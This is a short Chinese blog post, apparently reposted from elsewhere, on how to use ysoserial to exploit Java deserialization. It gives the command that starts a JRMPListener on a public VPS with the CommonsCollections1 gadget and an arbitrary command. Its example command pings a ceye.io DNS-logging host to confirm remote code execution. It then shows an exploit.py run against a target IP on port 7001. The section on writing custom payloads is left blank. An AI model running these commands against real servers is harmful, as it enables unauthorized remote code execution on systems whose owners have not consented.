反序列化工具ysoserial使用介绍

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了反序列化工具ysoserial使用介绍相关的知识,希望对你有一定的参考价值。

反序列化工具ysoserial使用介绍

0x00 ysoserial是什么?

ysoserial集合了各种java反序列化payload;
下载地址:https://github.com/angelwhu/ysoserial

0x01 基本使用方法

在公网vps上执行:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener  【port】 CommonsCollections1 ‘【commands】‘

port:公网vps上监听的端口号
commands:需要执行的命令
例子:

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 ‘ping -c 2  rce.267hqw.ceye.io‘

重启一个shell窗口:

python exploit.py 【目标ip】 【目标端口】 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 【JRMPListener ip】  【JRMPListener port】 JRMPClient

列子:

python exploit.py 118.89.53.139  7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 118.89.53.139  1099 JRMPClient

0x02 在ysoserial编写自己的payload

待定
技术分享图片

以上是关于反序列化工具ysoserial使用介绍的主要内容,如果未能解决你的问题,请参考以下文章

Java反序列化漏洞(ysoserial工具使用shiro反序列化利用)

对ysoserial工具及java反序列化的一个阶段性理解

java安全——ysoserial工具URLDNS链分析

java安全——ysoserial工具URLDNS链分析

java安全——ysoserial工具URLDNS链分析

java安全——ysoserial工具URLDNS链分析